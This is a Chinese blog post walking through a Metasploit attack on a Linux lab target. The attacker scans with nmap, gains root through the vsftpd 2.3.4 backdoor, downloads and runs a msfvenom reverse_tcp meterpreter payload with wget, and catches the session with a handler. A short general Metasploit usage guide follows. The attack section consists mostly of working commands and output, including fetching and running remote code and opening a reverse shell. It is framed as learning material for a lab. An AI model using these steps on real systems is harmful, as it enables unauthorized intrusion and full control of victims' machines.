使用metasploit对linux系统进行渗透测试提权


前言

使用metasploit对linux系统进行渗透测试


一、生成攻击载荷

使用msfvenom命令创建一个elf文件

┌──(root💀kali)-[~]
└─# msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.113 lport=5555 -f elf>pay.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes

将攻击载荷移动到www文件夹下(记得开启apache2服务)

┌──(root💀kali)-[~]
└─# mv pay.elf /var/www/html                              

二、获取目标主机物理访问权限

1.使用社会工程学获取
2.查看目标主机存在的漏洞进行渗透

这里介绍第二种
①开启postgresql服务,加载msf数据库
②使用nmap扫描目标主机,发现可攻击漏洞
③使用相关模块渗透,获取权限

┌──(root💀kali)-[~]
└─# service postgresql start
                                                                                                                                                       
┌──(root💀kali)-[~]
└─# service apache2 start  
msf6 > db_nmap -sV -u 192.168.1.103
[*] Nmap: Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-13 12:30 CST
[*] Nmap: Nmap scan report for 192.168.1.103
[*] Nmap: Host is up (0.0027s latency).
[*] Nmap: Not shown: 977 closed ports
[*] Nmap: PORT     STATE SERVICE     VERSION
[*] Nmap: 21/tcp   open  ftp         vsftpd 2.3.4
[*] Nmap: 22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: 23/tcp   open  telnet      Linux telnetd
[*] Nmap: 25/tcp   open  smtp        Postfix smtpd
[*] Nmap: 53/tcp   open  domain      ISC BIND 9.4.2
[*] Nmap: 80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
......
[*] Nmap: Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 12.28 seconds
msf6 > services
Services
========

host           port  proto  name          state     info
----           ----  -----  ----          -----     ----
192.168.1.1    80    tcp    http          open
192.168.1.1    1900  tcp    upnp          open
192.168.1.101  548   tcp    afp           filtered
192.168.1.102  8080  tcp    tcpwrapped    open
192.168.1.103  21    tcp    ftp           open      vsftpd 2.3.4
192.168.1.103  22    tcp    ssh           open      OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
192.168.1.103  23    tcp    telnet        open      Linux telnetd
192.168.1.103  25    tcp    smtp          open      Postfix smtpd
192.168.1.103  53    tcp    domain        open      ISC BIND 9.4.2
192.168.1.103  80    tcp    http          open      Apache httpd 2.2.8 (Ubuntu) DAV/2
....
msf6 > 

发现vsftpd2.3.4,这个服务存在漏洞,可以进行渗透(之前的文章详细讲过如何渗透vsftpd2.3.4)
点击查看vsftp2.3.4渗透测试提权小白教程

[*] 192.168.1.103:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.1.103:21 - USER: 331 Please specify the password.
[+] 192.168.1.103:21 - Backdoor service has been spawned, handling...
[+] 192.168.1.103:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.103:6200) at 2021-05-13 12:37:16 +0800
wget http://192.168.1.113/pay.elf
--06:57:46--  http://192.168.1.113/pay.elf
           => `pay.elf'
Connecting to 192.168.1.113:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207

    0K                                                       100%   37.10 MB/s

06:57:46 (37.10 MB/s) - `pay.elf' saved [207/207]

chmod 777 pay.elf
./pay.elf

使用wget命令下载文件,修改权限并运行

三、加载主控端handler

msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.113    yes       The listen address (an interface may be specified)
   LPORT  5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.113:5555 
[*] Sending stage (3012548 bytes) to 192.168.1.103

等待主控端handler的响应,对linux系统渗透测试完成


总结

本文简单介绍了使用metasploit对linux系统渗透测试提权,获取linux访问权限使用的是常见的vsftpd2.3.4漏洞,紧接着生成主控端,完成提权。仅供学习

  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Metasploit 是一个常用的渗透测试框架,它可以帮助安全研究人员和渗透测试人员识别和利用漏洞,以便在测试过程中评估网络和系统的安全性。以下是 Metasploit 渗透测试框架的基本使用方法: 1. 安装 MetasploitMetasploit 可以在 Windows、Linux 和 Mac OS X 等操作系统上运行。你可以从 Metasploit 的官方网站下载并安装它。 2. 启动 Metasploit:在命令行界面中输入 msfconsole 命令启动 Metasploit。 3. 搜索漏洞:在 Metasploit 中,你可以使用 search 命令来搜索漏洞。例如,如果你想搜索所有与 Apache 相关的漏洞,可以输入以下命令: search apache 4. 选择漏洞:通过搜索漏洞,你可以找到感兴趣的漏洞,并且可以使用 use 命令来选择一个要利用的漏洞。例如,如果你想选择 Apache Struts2 远程代码执行漏洞,可以输入以下命令: use exploit/multi/http/struts2_content_type_ognl 5. 配置选项:在选择漏洞后,你需要配置一些选项,例如目标 IP 地址和端口号、攻击载荷等。可以使用 show options 命令来查看所有可用选项,并使用 set 命令来配置选项。例如,如果你想设置目标 IP 地址为 192.168.1.100,可以输入以下命令: set RHOST 192.168.1.100 6. 运行攻击:在配置选项后,你可以使用 exploit 命令来运行攻击。Metasploit 将自动启动攻击载荷,并尝试利用漏洞。例如,如果你想运行 Apache Struts2 远程代码执行漏洞攻击,可以输入以下命令: exploit 7. 获取访问权限:如果攻击成功,Metasploit 将尝试获取访问权限。在访问权限获取之后,你可以使用 shell 命令来访问目标系统的命令行界面。例如,如果你想访问目标系统的 shell,可以输入以下命令: shell 上述是 Metasploit 渗透测试框架的基本使用方法,但请注意,在进行渗透测试时,请确保获得了所有必要的授权和许可,以避免违反法律和伦理规定。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我重来不说话

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值